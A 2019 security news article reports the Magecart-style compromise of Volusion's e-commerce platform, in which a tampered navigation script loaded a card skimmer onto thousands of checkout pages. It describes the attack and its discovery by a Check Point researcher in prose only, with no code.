Show vulnerabilities with patch / with exploit
10 October 2019

Hackers hit Volusion e-commerce sites in pursuit of customers’ credit card data


Hackers hit Volusion e-commerce sites in pursuit of customers’ credit card data

Hackers compromised the infrastructure of Volusion cloud-based e-commerce platform to infect customer checkout pages with malicious JavaScript code that pilfers payment card data. The info stealing code was found to be embedded in a JavaScript file that is part of the Volusion e-commerce software. It is estimated that more than 6,500 sites are affected, but given the Volusion claim it has more than 20,000 customers, that number could be even higher.

The compromise was discovered by Check Point security researcher Marcel Afrahim while shopping on Sesame Street Live Store, which sells various merchandise from the popular kids show. The site is build with Volusion’s All-in-One E-commerce Website Builder and Volusion even provides the nameservers. On the checkout page the researcher had noted a strange javascript file named 'resources.js' included in a bucket called ‘volusionapi’ that was loaded from storage.googleapis.com.

For those unaware, storage.googleapis.com is a Google Cloud Storage domain name, which is a RESTful online file storage web service for storing and accessing data on Google Cloud Platform infrastructure. Anyone can signup and chose a unique bucket name and serve content with the performance and scalability of Google’s cloud. The odd part was that the file was the only resource loaded from a source other than 'sesamestreetlivestore.com' or 'volusion.com' affiliated websites.

'Resources.js' is a seemingly innocuous JavaScript API called ‘JavaScript Cookie’ designed for handling cookies, but in reality the script reads the values typed in the fields for credit card information, encodes it in Base64 and stores it in the browser's temporary 'sessionStorage' with the name '__utmz_opt_in_out'. It then is exfiltrated to 'volusion-cdn.com/analytics/beacon' - the attacker's domain pretending to look like it was part of Volusion's infrastructure.

“While it is not overly sophisticated, the actors behind this operation went through some lengthy steps to make the traffic look normal,” the researcher said.

As to how did the script get into the page in the first place, Afrahim explained that it was done via the 'vnav.js' JavaScript, which is used for navigating the UI menu.

“The code itself is claiming to be jQuery UI — v1.10.3, used for navigation UI menu, but there is the addition of the script to load the secondary malicious script to post data via a third script,” the researcher said.

Quick search for the domains containing the tainted Volusion JavaScript revealed 6593 web pages that are probably hosted by Volusion and might be affected.

Above-mentioned incident falls into category of so called Magecart attacks or web card skimming, where cybercriminals steal payment card details from websites and e-commerce platforms. These types of attacks have been happening for nearly a decade, but in the past two years they have intensified. According to a latest RiskIQ report, over the last few months card-stealing scripts were spotted on more than 18 000 websites.

 

 

Back to the list

Latest Posts

Ventilator manufacturer Boyce Technologies hit by DoppelPaymer ransomware attack amid COVID-19 pandemic

Ventilator manufacturer Boyce Technologies hit by DoppelPaymer ransomware attack amid COVID-19 pandemic

The hackers are threatening to release the stolen information if an undisclosed crypto ransom is not paid by the firm.
10 August 2020
20 GB of confidential Intel documents and specifications leaked online

20 GB of confidential Intel documents and specifications leaked online

The leaked database contains Intel files that are subject to a non-disclosure agreement.
7 August 2020
Vulnerabilities in Gmail and iCloud allow hiding the sender

Vulnerabilities in Gmail and iCloud allow hiding the sender

Manipulating email header fields allows for various types of attacks to deceive the addressee.
6 August 2020